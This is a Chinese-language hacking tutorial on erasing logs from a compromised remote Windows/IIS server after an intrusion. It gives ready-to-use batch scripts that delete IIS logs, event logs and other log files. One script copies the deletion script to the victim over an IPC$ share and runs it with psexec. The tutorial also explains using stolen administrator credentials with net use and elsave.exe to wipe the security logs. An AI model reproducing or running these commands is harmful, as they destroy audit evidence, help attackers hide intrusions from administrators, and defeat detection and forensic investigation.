清除远程主机上的日志

大多数情况下，IIS的日志会忠实地记录它接收到的任何请求（也有特殊的不被IIS记录的攻击），一个优秀的系统管理员会利用这点来发现入侵的企图，保 护自己的系统。所以如果你是黑客，入侵系统成功后第一件事便是清除日志，擦去自己的形迹，这时可以用以下两个办法：一是自己编写批处理文件来解决，编写一 个能清除日志的批处理非常简单，方法是：新建一个具有如下内容的批处理文件：
　　 @del c:\winnt\system32\logfiles\*.*
　　 @del c:\winnt\system32\config\*.evt
　　 @del c:\winnt\system32\dtclog\*.*
　　 @del c:\winnt\system32\*.log
　　 @del c:\winnt\system32\*.txt
　　 @del c:\winnt\*.txt
　　 @del c:\winnt\*.log
　　 @del c:\del.bat

把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令，在它的前面加上“@”前缀字符，表示执行时本行在命令行或DOS里面不显示，另外del命令大家一定清楚吧？它是删除文件命令。

接下来再新建一个批处理文件，内容如下：
　　 @copy del.bat \\%1\c$
　　 @echo 向肉鸡复制本机的del.bat……OK
　　 @psexec \\%1 c:\del.bat
　　 @echo 在肉鸡上运行del.bat，清除日志文件……OK

保存为clean.bat即可，假设已经与肉鸡进行了IPC连接，然后在CMD下输入：clean.bat 肉鸡IP，即可清除肉鸡上的日志文件。

清除日志的另外一个方法是借助第三方软件，如著名黑客软件流光的开发者黑客小榕的elsave.exe，就是是一款可以远程清除系统日志、应用程序日 志、安全日志的软件，大家可以在网上下载到。elsave.exe使用起来很简单，首先利用获得的管理员账号与对方建立IPC会话：net use \\ip pass /user: user，然后在命令行下执行如下命令：elsave -s \\ip -l application -C，这样就删除了安全日志。